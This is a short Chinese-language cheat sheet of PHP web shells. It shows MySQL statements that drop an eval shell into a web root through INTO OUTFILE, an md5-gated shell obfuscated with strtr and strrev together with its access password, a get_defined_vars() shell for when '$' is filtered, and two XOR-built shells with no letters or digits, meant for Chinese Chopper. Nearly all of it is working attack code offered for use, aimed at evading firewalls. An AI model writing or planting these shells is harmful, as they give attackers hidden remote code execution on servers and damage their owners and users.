1.mysql執行語句拿shell
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php';
2.利用md5繞過waf
---------------------
本體
<?php
$str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';
$str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));
$str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
$str4 = strrev($_POST['a']);
$str5 = strrev($str4);
$str3($str5);
}
?>
---------------------
本質
<?php if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ assert($_POST['a']); } ?>
------------------------利用
.php?a=3fion0hj5965698jhh密碼a
注:default失敗!其他編碼成功!
3.get_defined_vars()函數馬:在過濾$的情況下可使用
<?php
eval(get_defined_vars()['_POST']['1']);
?>
4.不含字母數字馬
注:只能菜刀連接!
<?php
$_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
$__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>
或者
<?php
$_=(urldecode('%01')^'`').(urldecode('%13')^'`').(urldecode('%13')^'`').(urldecode('%05')^'`').(urldecode('%12')^'`').(urldecode('%14')^'`');
$__='_'.(urldecode('%0D')^']').(urldecode('%2F')^'`').(urldecode('%0E')^']').(urldecode('%09')^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>
https://www.freebuf.com/articles/web/173579.html
https://mochazz.github.io/2017/12/04/bypass1/